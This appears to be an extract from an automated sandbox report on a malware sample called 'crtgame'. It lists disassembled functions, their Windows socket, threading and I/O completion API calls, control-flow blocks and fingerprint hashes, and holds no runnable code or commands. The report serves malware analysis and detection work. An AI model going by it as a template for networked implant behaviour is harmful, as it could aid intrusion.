                                                                              • Instruction ID: 736179e13ab8bfe9b809ec545d0a3082965a32e763a583f4402a8d04f7b5e1e9
                                                                              • Opcode Fuzzy Hash: 396d01aa84ac9ecef63380985845c50a33022d061ca41cfc6b460a74526ddd18
                                                                              • Instruction Fuzzy Hash: 9421A1B9900614EFCB14CF68C44479ABBB5FF88714F158549EC1997302DBB4EA09CBE0

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • WSASetLastError.WS2_32(00000000,?,?,?,?,?,02C2358B,?,?,?,?,?,?,?,02C28FA9,?), ref: 02C22EEE
                                                                              • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02C22EFD
                                                                              • WSAGetLastError.WS2_32(?,02C2358B,?,?,?,?,?,?,?,02C28FA9,?,?,?,00000001,00000006,?), ref: 02C22F0C
                                                                              • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02C22F36
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$Socketsetsockopt
                                                                              • String ID:
                                                                              • API String ID: 2093263913-0
                                                                              • Opcode ID: fc795afc5ce15c285e1cef54e865659c826b4cd7a67982f0eacd2d051d1fcb0f
                                                                              • Instruction ID: 38500ce5caf06d0198b59682b294d7de181ed267744902c2fcdb8065be0f4d30
                                                                              • Opcode Fuzzy Hash: fc795afc5ce15c285e1cef54e865659c826b4cd7a67982f0eacd2d051d1fcb0f
                                                                              • Instruction Fuzzy Hash: 14018876940214FBDB309F66DC88B5BBBA9EB85771F008A65FD08CB141D7718904CBA0

                                                                              Control-flow Graph (basic blocks with successors; the executed / not executed shading of the graph image is not preserved in text)
                                                                              • 630 2c22db5-2c22dc8 -> 631, 632
                                                                              • 631 2c22de4-2c22de8 -> 633, 634
                                                                              • 632 2c22dca-2c22dd2: call 2c30510 -> 641
                                                                              • 633 2c22dea-2c22ded -> 634, 636
                                                                              • 634 2c22dfc-2c22e07: call 2c22d39 -> 640
                                                                              • 636 2c22def-2c22dfa: call 2c30510 -> 641
                                                                              • 640 2c22e0c-2c22e11 -> 643, 644
                                                                              • 641 2c22dd8 -> 645
                                                                              • 643 2c22e13 -> 646
                                                                              • 644 2c22ddd-2c22de3 (no successors)
                                                                              • 645 2c22ddb -> 644
                                                                              • 646 2c22e16-2c22e18 -> 645, 647
                                                                              • 647 2c22e1a-2c22e35: call 2c30510, call 2c2166f -> 652, 653
                                                                              • 652 2c22e37-2c22e52: call 2c30510, call 2c2166f -> 645, 653
                                                                              • 653 2c22e54-2c22e97: WSASetLastError, select, call 2c29e92 -> 659, 660
                                                                              • 659 2c22ea6 -> 663, 664
                                                                              • 660 2c22e99-2c22ea4: call 2c30510 -> 665
                                                                              • 663 2c22eb6-2c22eb8 -> 645, 665
                                                                              • 664 2c22ea8-2c22eb3: call 2c30510 -> 663
                                                                              • 665 2c22ebe-2c22ed2: call 2c22d39 -> 646, 671
                                                                              • 671 2c22ed8 -> 644
                                                                              APIs
                                                                                • Part of subcall function 02C22D39: WSASetLastError.WS2_32(00000000,?,?,00000001,?,?,02C23390,00000001,?,00000000,?,?,?,?,?), ref: 02C22D47
                                                                                • Part of subcall function 02C22D39: WSASend.WS2_32(?,?,?,00000000,00000000,00000000,00000000), ref: 02C22D5C
                                                                              • WSASetLastError.WS2_32(00000000,00000000,?,?), ref: 02C22E6D
                                                                              • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02C22E83
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$Sendselect
                                                                              • String ID: 3'
                                                                              • API String ID: 2958345159-280543908
                                                                              • Opcode ID: 996d179e1f588183223f810f08cf006d1e4b167571041c286babbdba5fcdc7b4
                                                                              • Instruction ID: 27b3a55e4a657caa4c7c12636ad2ea0b3a21ffd9d94c910a3fbc8e9071716694
                                                                              • Opcode Fuzzy Hash: 996d179e1f588183223f810f08cf006d1e4b167571041c286babbdba5fcdc7b4
                                                                              • Instruction Fuzzy Hash: 2B31B0B6A002299FDF15DF65C8047EE7BEAEF44314F00495AEC0497240EBB49559DFE1

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • WSASetLastError.WS2_32(00000000,?,?), ref: 02C22AEA
                                                                              • connect.WS2_32(00000010,?,?), ref: 02C22AF5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLastconnect
                                                                              • String ID: 3'
                                                                              • API String ID: 374722065-280543908
                                                                              • Opcode ID: d85d5bbc1fd3770631c7c5720b4d0a1e6e7e568917043967a7af56def96bd350
                                                                              • Instruction ID: 52b5225d565427a4e157c2d09992c4714ed03d3d585db67056911d4dbb5dfdfd
                                                                              • Opcode Fuzzy Hash: d85d5bbc1fd3770631c7c5720b4d0a1e6e7e568917043967a7af56def96bd350
                                                                              • Instruction Fuzzy Hash: 0721CC76D00214ABDF14EFB5C4046AEBBBADF84324F104599DC1997381EFB456099FD2

                                                                              Control-flow Graph (basic blocks with successors; the executed / not executed shading of the graph image is not preserved in text)
                                                                              • 703 2c2353e-2c23555: call 2c44df0 -> 706, 707
                                                                              • 706 2c23576-2c2359c: call 2c22edd -> 713, 714
                                                                              • 707 2c23557-2c23571: call 2c21996 -> 712
                                                                              • 712 2c23688-2c23697 (no successors)
                                                                              • 713 2c2359e-2c235a8 -> 715
                                                                              • 714 2c235ad-2c235c3: CreateIoCompletionPort -> 716, 717
                                                                              • 715 2c23684 -> 718
                                                                              • 716 2c235c5-2c235d9: GetLastError, call 2c30510 -> 723
                                                                              • 717 2c235db-2c235e2: call 2c30510 -> 723
                                                                              • 718 2c23687 -> 712
                                                                              • 723 2c235e4-2c235ed -> 724, 725
                                                                              • 724 2c23626-2c23630 -> 726, 727
                                                                              • 725 2c235ef-2c23624: call 2c30510, call 2c229ee -> 718
                                                                              • 726 2c23632-2c23633 -> 730, 731
                                                                              • 727 2c23640 -> 732
                                                                              • 730 2c23635-2c23638 -> 732
                                                                              • 731 2c2363a-2c2363e -> 732
                                                                              • 732 2c23644-2c2366a: call 2c2d87f -> 737, 738
                                                                              • 737 2c23671-2c23681: call 2c30510 -> 715
                                                                              • 738 2c2366c: call 2c2143f -> 737
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog
                                                                              • String ID:
                                                                              • API String ID: 3519838083-0
                                                                              • Opcode ID: 068196df83c92e3aff17a77668848cadba38b60ae559f5163575c4ec4df41d12
                                                                              • Instruction ID: 89edbbe5ee0cc309c03e3bbc4d40b3ec0c5bbfc29f926be4bf2869336cc72f78
                                                                              • Opcode Fuzzy Hash: 068196df83c92e3aff17a77668848cadba38b60ae559f5163575c4ec4df41d12
                                                                              • Instruction Fuzzy Hash: 43514BB190425ADFCB19DF68C4406AABBB5FF48320F14855EE8299B381DB74DA14CF91

                                                                              Control-flow Graph (basic blocks with successors; the executed / not executed shading of the graph image is not preserved in text)
                                                                              • 742 2c2369a-2c236b1: InterlockedIncrement -> 743, 744
                                                                              • 743 2c236b3-2c236b7 -> 745
                                                                              • 744 2c236b9-2c236c1 -> 746, 747
                                                                              • 745 2c23722-2c2372d: call 2c2247d -> 755
                                                                              • 746 2c236c3-2c236ca -> 745
                                                                              • 747 2c236cc-2c236fc: WSARecv, WSAGetLastError -> 749, 750
                                                                              • 749 2c23705-2c2370f -> 751
                                                                              • 750 2c236fe-2c23703 -> 751
                                                                              • 751 2c23712-2c23715 -> 753, 754
                                                                              • 753 2c23717-2c2371c -> 754, 756
                                                                              • 754 2c2372f-2c23735: call 2c22420 -> 755
                                                                              • 755 2c2373a-2c2373c (no successors)
                                                                              • 756 2c2371e-2c23721 -> 745
                                                                              APIs
                                                                              • InterlockedIncrement.KERNEL32(?), ref: 02C236A7
                                                                                • Part of subcall function 02C22420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C22432
                                                                                • Part of subcall function 02C22420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C22445
                                                                                • Part of subcall function 02C22420: RtlEnterCriticalSection.NTDLL(?), ref: 02C22454
                                                                                • Part of subcall function 02C22420: InterlockedExchange.KERNEL32(?,00000001), ref: 02C22469
                                                                                • Part of subcall function 02C22420: RtlLeaveCriticalSection.NTDLL(?), ref: 02C22470
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                              • String ID:
                                                                              • API String ID: 1601054111-0
                                                                              • Opcode ID: be4ab8e3f9a00b452baae10fffe343b245c68ae4c3a98e33cdd5cc2f28809230
                                                                              • Instruction ID: c48001732b2c2cef5eb9e3ddcf44335f6511c94da44188212dab1e071f4f9945
                                                                              • Opcode Fuzzy Hash: be4ab8e3f9a00b452baae10fffe343b245c68ae4c3a98e33cdd5cc2f28809230
                                                                              • Instruction Fuzzy Hash: 7011C1B5100258ABDF218E14CC85FAA3BAAFF50750F104556FE528B2D0CF38E968CB94

                                                                              Control-flow Graph (basic blocks with successors; the executed / not executed shading of the graph image is not preserved in text)
                                                                              • 758 2c31af0-2c31b12: call 2c32db9 -> 761, 762
                                                                              • 761 2c31b14-2c31b18 (no successors)
                                                                              • 762 2c31b19-2c31b2f -> 763, 764
                                                                              • 763 2c31b31-2c31b34 -> 764, 765
                                                                              • 764 2c31b3d-2c31b50: ResumeThread (no successors)
                                                                              • 765 2c31b36-2c31b37: CloseHandle -> 764
                                                                              APIs
                                                                              • __beginthreadex.LIBCMT ref: 02C31B06
                                                                              • CloseHandle.KERNEL32(?,00000000,?,?,?,?,02C2A5DA,00000000), ref: 02C31B37
                                                                              • ResumeThread.KERNELBASE(?,00000000,?,?,?,?,02C2A5DA,00000000), ref: 02C31B45
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandleResumeThread__beginthreadex
                                                                              • String ID:
                                                                              • API String ID: 1685284544-0
                                                                              • Opcode ID: 6aac113702601551c08e5e9a091b9be42711ed72c4bcd1a2da7a5ecedc815f45
                                                                              • Instruction ID: 5521950dd2c601ab45b7f72be1aebf0aec10cb3f7b77924a7538ea365fcd416e
                                                                              • Opcode Fuzzy Hash: 6aac113702601551c08e5e9a091b9be42711ed72c4bcd1a2da7a5ecedc815f45
                                                                              • Instruction Fuzzy Hash: 11F0C8747402009FD7209E5CDC80FD173D8AF88328F18096AF548C7280D3B1E8929AD0
                                                                              APIs
                                                                              • InterlockedIncrement.KERNEL32(02C57524), ref: 02C21ABA
                                                                              • WSAStartup.WS2_32(00000002,00000000), ref: 02C21ACB
                                                                              • InterlockedExchange.KERNEL32(02C57528,00000000), ref: 02C21AD7
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Interlocked$ExchangeIncrementStartup
                                                                              • String ID:
                                                                              • API String ID: 1856147945-0
                                                                              • Opcode ID: def52d54676f29c82fc8a4610d01539f29d7ae1f255e6d76b7ceb627a360d18c
                                                                              • Instruction ID: fcdbbeaa057dc3eff24d15fff67b6f10b5d64d74cff1ddcb2ddeaca5d40ca8d1
                                                                              • Opcode Fuzzy Hash: def52d54676f29c82fc8a4610d01539f29d7ae1f255e6d76b7ceb627a360d18c
                                                                              • Instruction Fuzzy Hash: 7AD02EB4D802145BF21066A0AC0EB3AF3ACE700610F800B60FC2AC00C0EB50A9ACC1EA
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C24B1D
                                                                                • Part of subcall function 02C21BA7: __EH_prolog.LIBCMT ref: 02C21BAC
                                                                                • Part of subcall function 02C21BA7: RtlEnterCriticalSection.NTDLL ref: 02C21BBC
                                                                                • Part of subcall function 02C21BA7: RtlLeaveCriticalSection.NTDLL ref: 02C21BEA
                                                                                • Part of subcall function 02C21BA7: RtlEnterCriticalSection.NTDLL ref: 02C21C13
                                                                                • Part of subcall function 02C21BA7: RtlLeaveCriticalSection.NTDLL ref: 02C21C56
                                                                                • Part of subcall function 02C2DA84: __EH_prolog.LIBCMT ref: 02C2DA89
                                                                                • Part of subcall function 02C2DA84: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C2DB08
                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 02C24C1D
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                              • String ID:
                                                                              • API String ID: 1927618982-0
                                                                              • Opcode ID: acd8bb7f72a19f0023bad7098265d26eba0f5652b989c4a4fd99fdd706496e04
                                                                              • Instruction ID: 61f70b27f6494b75117bc82ce718a4b45f2272ea0eb1ebf96fb92367344b99a4
                                                                              • Opcode Fuzzy Hash: acd8bb7f72a19f0023bad7098265d26eba0f5652b989c4a4fd99fdd706496e04
                                                                              • Instruction Fuzzy Hash: F2513BB1D04258DFDB15DFA8C484AEEFFB5AF48314F14816AE906AB351DB709A48CF60
                                                                              APIs
                                                                              • WSASetLastError.WS2_32(00000000,?,?,00000001,?,?,02C23390,00000001,?,00000000,?,?,?,?,?), ref: 02C22D47
                                                                              • WSASend.WS2_32(?,?,?,00000000,00000000,00000000,00000000), ref: 02C22D5C
                                                                                • Part of subcall function 02C29E92: WSAGetLastError.WS2_32(?,00000080,00000017,02C23114), ref: 02C29EA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$Send
                                                                              • String ID:
                                                                              • API String ID: 1282938840-0
                                                                              • Opcode ID: 1b3cd673863a5a4c0cd75fdb703c99097f4261b7ff4b1189e61813153add09fe
                                                                              • Instruction ID: e8704e00a14d99866b4fefd75c0184a7ebbdb1fb5ebf5b198f0da8ec0e46ed95
                                                                              • Opcode Fuzzy Hash: 1b3cd673863a5a4c0cd75fdb703c99097f4261b7ff4b1189e61813153add09fe
                                                                              • Instruction Fuzzy Hash: B3017976500215EFD7209F55884456BB7EDFB44750B10096EE85983200EB709D04DBA1
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C25049
                                                                                • Part of subcall function 02C23D7E: htons.WS2_32(?), ref: 02C23DA2
                                                                                • Part of subcall function 02C23D7E: htonl.WS2_32(00000000), ref: 02C23DB9
                                                                                • Part of subcall function 02C23D7E: htonl.WS2_32(00000000), ref: 02C23DC0
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: htonl$H_prologhtons
                                                                              • String ID:
                                                                              • API String ID: 4039807196-0
                                                                              • Opcode ID: 4da1a1de32a8fb3b04bf6027110f0296da9c0e34f8f11b33100607576392843a
                                                                              • Instruction ID: f68efe8891b7e4aa2b0e2aa4cc52d25b4819fb2ba15da57e97fe3e8bbe7fd55e
                                                                              • Opcode Fuzzy Hash: 4da1a1de32a8fb3b04bf6027110f0296da9c0e34f8f11b33100607576392843a
                                                                              • Instruction Fuzzy Hash: 9F814C71D0026E8ECF09DFA8D5806EEBBB5EF88310F10815AD855B7280EB755A49CFA5
                                                                              APIs
                                                                              • SHGetSpecialFolderPathA.SHELL32 ref: 02CA3C08
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C5A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C5A000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c5a000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: FolderPathSpecial
                                                                              • String ID:
                                                                              • API String ID: 994120019-0
                                                                              • Opcode ID: 2d977c71ea2b25280dab88f2b0f4f7015c99a4a617a71e9c94bc7c5857929ed0
                                                                              • Instruction ID: a7f964b95e2da1143abd2b66bffc58f5039b994771b2f455890631da4654e73c
                                                                              • Opcode Fuzzy Hash: 2d977c71ea2b25280dab88f2b0f4f7015c99a4a617a71e9c94bc7c5857929ed0
                                                                              • Instruction Fuzzy Hash: C72181F260C604AFE7157A0DEC46BBABBE4EB84720F06893EE7C547B50E631584186D7
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C2E352
                                                                                • Part of subcall function 02C21A01: TlsGetValue.KERNEL32 ref: 02C21A0A
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prologValue
                                                                              • String ID:
                                                                              • API String ID: 3700342317-0
                                                                              • Opcode ID: 013596d0ed8b1a26b384ee6b14bbc7f86b5e8bbbbbdff0f25acbf1b92a55a378
                                                                              • Instruction ID: daec3b151def4595290b493e1618fc715c4cce4803ba81b658a9da4fd32535c4
                                                                              • Opcode Fuzzy Hash: 013596d0ed8b1a26b384ee6b14bbc7f86b5e8bbbbbdff0f25acbf1b92a55a378
                                                                              • Instruction Fuzzy Hash: 5D213EB6904219AFDB04DFA5D540AFFBBF9EF48311F10452EE908E7240DB71AA04DBA1
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C2DEE2
                                                                                • Part of subcall function 02C226DB: RtlEnterCriticalSection.NTDLL(?), ref: 02C22706
                                                                                • Part of subcall function 02C226DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02C2272B
                                                                                • Part of subcall function 02C226DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02C45553), ref: 02C22738
                                                                                • Part of subcall function 02C226DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02C22778
                                                                                • Part of subcall function 02C226DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02C227D9
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                              • String ID:
                                                                              • API String ID: 4293676635-0
                                                                              • Opcode ID: 90aaddd57fed936aadec8d661ae0331981b801181ce2cd5c26738bef17f09807
                                                                              • Instruction ID: a6245b8a1a7af693d30a89e1a64c5bee8765d76f4d84c0e7d634d78157033e37
                                                                              • Opcode Fuzzy Hash: 90aaddd57fed936aadec8d661ae0331981b801181ce2cd5c26738bef17f09807
                                                                              • Instruction Fuzzy Hash: 830190B5900B149FC328DF1AD640996FFF5EF88710B15C5AE944A8B721EB71AA40CF94
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C2DCC1
                                                                                • Part of subcall function 02C3354C: _malloc.LIBCMT ref: 02C33564
                                                                                • Part of subcall function 02C2DEDD: __EH_prolog.LIBCMT ref: 02C2DEE2
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog$_malloc
                                                                              • String ID:
                                                                              • API String ID: 4254904621-0
                                                                              • Opcode ID: 5783897a4f2722a2de1a582b8d5cb87b43fc3dce8ee7ad5429e0dc0e156049de
                                                                              • Instruction ID: d445e4d9fe9de9553cfad327ca6d836b2dce2d9c796e3306662878e13a1d6dca
                                                                              • Opcode Fuzzy Hash: 5783897a4f2722a2de1a582b8d5cb87b43fc3dce8ee7ad5429e0dc0e156049de
                                                                              • Instruction Fuzzy Hash: 0DE0C2B1A4424AABDB1DEFA8D80073E77A6EB44300F104AADB809D3640DF708A009A41
                                                                              APIs
                                                                                • Part of subcall function 02C3565A: __getptd_noexit.LIBCMT ref: 02C3565B
                                                                                • Part of subcall function 02C3565A: __amsg_exit.LIBCMT ref: 02C35668
                                                                                • Part of subcall function 02C32E93: __getptd_noexit.LIBCMT ref: 02C32E97
                                                                                • Part of subcall function 02C32E93: __freeptd.LIBCMT ref: 02C32EB1
                                                                                • Part of subcall function 02C32E93: RtlExitUserThread.NTDLL(?,00000000,?,02C32E73,00000000), ref: 02C32EBA
                                                                              • __XcptFilter.LIBCMT ref: 02C32E7F
                                                                                • Part of subcall function 02C38794: __getptd_noexit.LIBCMT ref: 02C38798
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                              • String ID:
                                                                              • API String ID: 1405322794-0
                                                                              • Opcode ID: 9a0a9f47854afeae931929786d85e5669722c28d9e0460847d5e0f0e44082a64
                                                                              • Instruction ID: 472d6d59b1de3acc0fd3c262bd765b29813296d3d40198fbce3b51ed8c51fbea
                                                                              • Opcode Fuzzy Hash: 9a0a9f47854afeae931929786d85e5669722c28d9e0460847d5e0f0e44082a64
                                                                              • Instruction Fuzzy Hash: C2E0ECB2940600DFEB09BBA0D849F2D77B6AF05301F200959F5019B260DAB8AD40AF21
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C5A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C5A000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c5a000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle
                                                                              • String ID:
                                                                              • API String ID: 2962429428-0
                                                                              • Opcode ID: ad9e67a5dbf4182818223fb27fdbbfa945e541fbd82ee891e07dca1715771f1b
                                                                              • Instruction ID: bfae3da56a4913fa29a9970277f025cc291a253711afbec4ed1a77cfbd678a38
                                                                              • Opcode Fuzzy Hash: ad9e67a5dbf4182818223fb27fdbbfa945e541fbd82ee891e07dca1715771f1b
                                                                              • Instruction Fuzzy Hash: 6811B4B310C3089FE3057F6DEC856BAB7E9EF84620F06492EE6C1C3600DA316544C697
                                                                              APIs
                                                                                • Part of subcall function 02C31010: OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02C310B0
                                                                                • Part of subcall function 02C31010: CloseHandle.KERNEL32(00000000), ref: 02C310C5
                                                                                • Part of subcall function 02C31010: ResetEvent.KERNEL32(00000000), ref: 02C310CF
                                                                                • Part of subcall function 02C31010: CloseHandle.KERNEL32(00000000,A5B40990), ref: 02C31104
                                                                              • TlsSetValue.KERNEL32(00000025,?), ref: 02C31BAA
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseEventHandle$OpenResetValue
                                                                              • String ID:
                                                                              • API String ID: 1556185888-0
                                                                              • Opcode ID: 6749feeb06201c0291085e414144c02b9c1e99170d026915188fec732cba7575
                                                                              • Instruction ID: 459eebb59d6c9ab0c32551479f7faec76c152a1c52f3eb769d9bf69c87913ebf
                                                                              • Opcode Fuzzy Hash: 6749feeb06201c0291085e414144c02b9c1e99170d026915188fec732cba7575
                                                                              • Instruction Fuzzy Hash: CD01DF72A00244AFD700CF59C805F5ABBACFB057B0F144B6AF829D3680D771A9008AE4
                                                                              APIs
                                                                                • Part of subcall function 02C29462: __EH_prolog.LIBCMT ref: 02C29467
                                                                                • Part of subcall function 02C29462: _Allocate.LIBCPMT ref: 02C294BE
                                                                              • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02C303A2
                                                                              • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02C303AA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateErrorFormatH_prologLastMessage
                                                                              • String ID: Unknown error$invalid string position
                                                                              • API String ID: 58466617-1837348584
                                                                              • Opcode ID: 49476b785662bba064a15cb7acfc32083084758ef502fd678c8c15daa9a458f0
                                                                              • Instruction ID: 172a4d655412469ab146b833eb3b4f71c69768a3f0e68f5447bea45918b7b8c9
                                                                              • Opcode Fuzzy Hash: 49476b785662bba064a15cb7acfc32083084758ef502fd678c8c15daa9a458f0
                                                                              • Instruction Fuzzy Hash: 0051AA716083419FE715CF24C880B2FBBE4AB98758F500D2DF48697292D771E688CF96
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,02C34896,?,?,?,00000001), ref: 02C38F2D
                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 02C38F36
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: 547bfb5df3f506e4113eb18a65570c636a9ae72e2fa57b1e4d391d3cc364bfad
                                                                              • Instruction ID: c32ced0ff370891aeafe4db2ac49568fab965ce044387a600010bb3a32f72d7f
                                                                              • Opcode Fuzzy Hash: 547bfb5df3f506e4113eb18a65570c636a9ae72e2fa57b1e4d391d3cc364bfad
                                                                              • Instruction Fuzzy Hash: C0B09239486208EBCB012F91FC0DB8ABFA8EB04662F004950F60E440618B7264289AE2
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C224E6
                                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02C224FC
                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02C2250E
                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02C2256D
                                                                              • SetLastError.KERNEL32(00000000,?,74DEDFB0), ref: 02C2257F
                                                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,74DEDFB0), ref: 02C22599
                                                                              • GetLastError.KERNEL32(?,74DEDFB0), ref: 02C225A2
                                                                              • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C225F0
                                                                              • InterlockedDecrement.KERNEL32(00000002), ref: 02C2262F
                                                                              • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02C2268E
